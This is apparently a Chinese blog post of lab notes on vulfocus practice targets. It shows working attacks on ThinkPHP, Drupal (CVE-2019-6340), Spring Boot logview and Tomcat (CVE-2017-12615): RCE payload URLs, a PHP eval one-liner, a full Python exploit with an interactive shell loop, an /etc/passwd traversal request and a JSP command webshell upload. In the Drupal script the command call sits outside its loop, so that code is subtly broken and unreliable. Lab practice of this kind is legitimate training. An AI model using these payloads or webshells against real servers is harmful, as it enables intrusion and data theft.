vulfocus打靶笔记

最新推荐文章于 2024-04-21 21:36:34 发布
最新推荐文章于 2024-04-21 21:36:34 发布
阅读量183 收藏 1
点赞数 1
文章标签: 笔记 python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61913198/article/details/133917852
版权

1.名称: 命令执行漏洞 

描述: 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行 

复现:

访问url发现提示

根据提示构造

http://ip/index.php?cmd=ls%20/tmp

发现成功执行

2.thinkphp-2x-rce 代码执行

描述: ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞

复现:

访问url,发现是

根据提示:是preg_replace的/e模式匹配路由

构造一句话木马  /a/b/c/${@print(($_POST[1]))}

然后使用蚁剑连接

连接成功

3.thinkphp 代码执行 (CNVD-2018-24942)

描述: ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。

复现:

打开目标发现

对目标进行漏洞扫描,发现

发现目标存在thinkphp5代码执行漏洞

构造payload:

http://ip/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20

成功执行

读取flag

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp

成功读取

4.名称: drupal 代码执行 (CVE-2019-6340) 

描述: Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 该漏洞源于某些字段在通过非表格(non-form resources)类型输入时未能正确过滤,导致潜在的任意PHP代码执行。 

复现:

使用exp:

import requests

import sys

import re


if len(sys.argv)!=2:

    print('+---------------------------------------------------------------+')

    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub          +')

    print('+                    https://freeerror.org/d/488                +')

    print('+---------------------------------------------------------------+')

    print('+ USE: python3 <filename> <url>                                 +')

    print('+ EXP: python3 cve-2019-6340_cmd.py http://freeerror.org:8080   +')

    print('+ VER: Drupal < 8.6.10                                          +')

    print('+      Drupal < 8.5.12                                          +')

    print('+---------------------------------------------------------------+')

    sys.exit()


url = sys.argv[1]

cmd = "whoami"

dir = "/node/?_format=hal_json"

url_dir = url + dir

cmd_len = len(cmd)


payload = "{\r\n  \"link\": [\r\n    {\r\n      \"value\": \"link\",\r\n      \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n    }\r\n  ],\r\n  \"_links\": {\r\n    \"type\": {\r\n      \"href\": \"%s/rest/type/shortcut/default\"\r\n    }\r\n  }\r\n}" % (cmd_len,cmd,url)

headers = {

    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",

    'Connection': "close",

    'Content-Type': "application/hal+json",

    'Accept': "*/*",

    'Cache-Control': "no-cache"   

    }

response = requests.request("POST", url_dir, data=payload, headers=headers)

if response.status_code==403 and "u0027access" in response.text :

    print ("[+] Find Drupal CVE-2019-6340 Vuln!\n")

else:

    print ("[-] Not Drupal CVE-2019-6340 Vuln! Good Luck~\n")

    sys.exit()


def do_post(cmd):

    payload = "{\r\n  \"link\": [\r\n    {\r\n      \"value\": \"link\",\r\n      \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n    }\r\n  ],\r\n  \"_links\": {\r\n    \"type\": {\r\n      \"href\": \"%s/rest/type/shortcut/default\"\r\n    }\r\n  }\r\n}" % (cmd_len,cmd,url)


    headers = {

        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",

        'Connection': "close",

        'Content-Type': "application/hal+json",

        'Accept': "*/*",

        'Cache-Control': "no-cache"

        }

    global response

    response = requests.request("POST", url_dir, data=payload, headers=headers)

    r = response.text

    s = r.split("}")[1]

    print (s)


while 1:

    cmd = input("Shell >>> ")

    cmd_len = len(cmd)

    if cmd == "exit" : exit(0)

do_post(cmd)

获取成功

5.名称: Spring Boot 目录遍历 (CVE-2021-21234) 

描述: Spring Boot是由Pivotal团队提供的全新框架,其设计目的是用来简化新Spring应用的初始搭建以及开发过程。该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。通过这种方式,Spring Boot致力于在蓬勃发展的快速应用开发领域(rapid application development)成为领导者。 spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端点公开日志文件目录。要查看的文件名和基本文件夹(相对于日志文件夹根)都可以通过请求参数指定。虽然检查了文件名参数以防止目录遍历攻击(因此`filename=../somefile` 将不起作用),但没有充分检查基本文件夹参数,因此`filename=somefile&base=../` 可以访问日志记录基目录之外的文件)。该漏洞已在 0.2.13 版中修复。0.2.12 的任何用户都应该能够毫无问题地进行更新,因为该版本中没有其他更改。除了更新或删除依赖项之外,没有解决此漏洞的方法。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。此外,可以通过在反向代理后面部署应用程序来限制对 logview 端点的访问。 

复现:

使用poc:/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../

成功读取

6.名称: tomcat 文件上传 (CVE-2017-12615) 

描述: Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。 

复现:使用漏扫发现目标存在put文件上传

使用burp,构造请求包

PUT /cmd.jsp/ HTTP/1.1

Host: ip

User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0

Content-Length: 417

Accept: */*

Content-Type: application/x-www-form-urlencoded

Cookie: PHPSESSID=uohevqsgoa0fvpopbua7eecoo7

Accept-Encoding: gzip


<%

    if("123".equals(request.getParameter("pwd"))){

        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();

        int a = -1;          

        byte[] b = new byte[1024];          

        out.print("<pre>");          

        while((a=in.read(b))!=-1){

            out.println(new String(b));          

        }

        out.print("</pre>");

    } 

%>

构造访问:/cmd.jsp?&pwd=123&cmd=pwd

读取flag

Dulvren_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp-2x-rce 1 代码执行
weixin_51558394的博客
08-17 449
thinkphp-2x-rce 代码执行
打靶法求解边值问题
05-04
求解线性微分方程边值问题的数值解法有打靶法和有限差分法,有详细的推导过程和MATLAB代码,以及相应的算例实现,并对两种方法进行优劣性比较
坦克打靶赛题程序
04-02
设计并制作一个可以寻迹的简易坦克车,并在其上安装由电动机驱动的可以自由旋转的炮塔,在炮塔上安装激光笔以代替火炮。 本题的任务是控制坦克沿靶场中预先设置的轨迹,快速寻迹行进,并同时以光电方式瞄准光靶,实现激光打靶
基于c#语言的打靶程序
11-20
本程序完成了常见的打靶游戏,采用了c#语言编写,初学者可以利用他学习c#语言,也可以测试这个游戏,娱乐和学习两不误。
vulfocus靶场thinkphp命令执行cve-2018-1002015
最新发布
没有故事
04-21 261
漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。thinkPHP 5.0.x版本和5.1.x版本中存在。使用工具: thinkphp综合利用工具,然后使用webshell工具进行连接即可。
坦克循迹打靶
01-21
#include<stm32f10x.h> #include<stm32f10x_tim.h> #include<misc.h> #include<stm32f10x_gpio.h> #include<stm32f10x_rcc.h> #include"1602.h" #include"delay.h" unsigned char second=0; unsigned int T1C1_Val=4000; //设置初始pwm占空比 60000/10000 unsigned int T1C2_Val=4000; //设置初始pwm占空比60000/10000 char str[]="smart car"; u8 flag=0; u8 point=0; //炮击点 //位取反 void GPIO_PinReverse(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin)//GPIO_PinReverse(GPIOx, GPIO_Pin_) { /* Check the parameters */ assert_param(IS_GPIO_ALL_PERIPH(GPIOx)); assert_param(IS_GPIO_PIN(GPIO_Pin)); GPIOx->ODR ^= GPIO_Pin; } void gpio_config() { GPIO_InitTypeDef GPIO_InitStructure;//定义GPIO的结构体 //Step1.开启TIM和相应端口时钟
C语言——飞机打靶游戏
04-15
本代码用C语言撰写,可以使用dev C++等编译器运行。可以使用键盘'a'、's'、'd'、'w' 键进行上下左右移动飞机模型,按空格键发射子弹,击中靶子,系统会自动重新生成靶子,按'q'键结束游戏,显示击中靶子次数。
ThinkPHP 2.x RCE
weixin_45439731的博客
07-26 260
preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)即:在目标字符中寻找符合正则规则的字符,替换为替换字符,如果此时的正则规则中使用了/e这个修饰符,则存在代码执行漏洞。知识点:/e 修饰符配合preg_replace()函数使用,可以把匹配到的字符串当作正则表达式执行PHP版本在5.2~5.6可以执行,但在PHP>=7时,不支持/e修饰符。
【漏洞复现-phpmyadmin-SQL注入】vulfocus/phpmyadmin-cve_2020_5504
10-12 2886
【phpmyadmin-SQL注入】写马
thinkphp-2x-rce 代码执行[VULFOCUS]
m0_37638874的博客
09-08 829
ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。s=/模块/控制器/操作/[参数名/参数值…http://serverName/index.php(或者其他应用入口文件)/模块/控制器/操作/[参数名/参数值…在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由。值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将。
【漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x
10-14 2011
【thinkphp-命令执行】日志包含
thinkphp-2x-rce 代码执行
weixin_46580614的博客
08-20 799
thinkphp-2x-rce 代码执行 漏洞描述 ​ ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 影响版本 Thinkphp 2.x的版本 实验环境 攻击机:win10 靶机:vulfocus平台 thinkphp-2x-rce
Thinkphp 2.x rce
qq_53086690的博客
11-23 918
Thinkphp 2.x rce Thinkphp简介 Thinkphp 是一个开源的,快速、简单的面向对象的轻量级PHP开发框架 漏洞影响版本 Thinkphp 2.x 漏洞概述 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,
thinkphp漏洞复现
YouthBelief的博客
10-25 2886
thinkphp漏洞前言一、thinkphp-2x-rce 代码执行0x01 漏洞描述0x02 影响版本0x03 漏洞利用0x04 漏洞修复二、thinkphp 代码执行 (CNVD-2018-24942)0x01 漏洞描述0x02 影响范围0x03 漏洞利用这就完成了,这边我们引用下大佬的poc0x04 漏洞修复三、 thinkphp3.2.x 代码执行0x01漏洞描述0x02影响范围0x03漏洞利用payload0x04漏洞修复四、thinkphp 命令执行 (CVE-2018-1002015)0x01
thinkphp 代码执行 (CNVD-2018-24942)
博客地址 www.sec0nd.top
07-14 500
ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。远程代码执行,读取当前目录 本来想试试上传一句话木马的,网站有点拉跨一直在转圈,好像写不进去根据之前的经验,flag在tmp目录下,就直接拿flag了 使用composer安装,并且一直保持最新版本使用的话,使用下面的指令更新到最新版本即可...
ThinkPHP 2.x 任意代码执行漏洞
EC_Carrot的博客
08-17 132
漏洞详细 详细请看:https://vulhub.org/#/environments/thinkphp/2-rce/ 漏洞复现 直接访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行代码phpinfo():
【vulhub】thinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现
qq_58873970的博客
09-07 370
----------------梦想,想像力和希望实现这些梦想的人的勇气充满希望。
Drupal 远程代码执行 CVE-2019-6340 已亲自复现
qq_42430287的博客
12-22 721
在请求体中使用了GuzzleHttp库的FnStream类和HandlerStack类,这两个类在正常情况下是用于处理HTTP请求的,但在这里被恶意利用来执行攻击者的代码。攻击者在HandlerStack类的handler属性中插入了pbtw%%rxtx,试图输出pbtw%rxtx字符串。如果攻击成功,则响应状态码为403,响应头中将出现pbtw%rxtx字样。
vulfocus靶场入门
七堇年的博客
02-22 5605
vulfocus靶场入门
matlab打靶计分
04-18
Matlab打靶计分是一种用于分析和评估射击精度的计分方法。它可以帮助射击运动员或者射击爱好者更好地了解他们的射击表现,并进行改进。 在Matlab中,可以使用图像处理和计算机视觉的技术来实现打靶计分。以下是一般的打靶计分流程: 1. 图像采集:使用摄像机或者其他图像采集设备拍摄射击目标的图像。 2. 图像预处理:对采集到的图像进行预处理,包括去噪、增强对比度等操作,以提高后续分析的准确性。 3. 目标检测:使用图像处理算法来检测和定位射击目标。这可以通过边缘检测、颜色分割等技术来实现。 4. 子弹孔检测:在目标上检测和识别子弹孔的位置。这可以通过阈值分割、形态学操作等技术来实现。 5. 打靶计分:根据子弹孔的位置和目标的规则,计算每个子弹孔的得分,并累加得到总分数。 6. 结果显示:将计算得到的得分结果以图形或者文字的形式显示出来,方便用户进行分析和评估。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值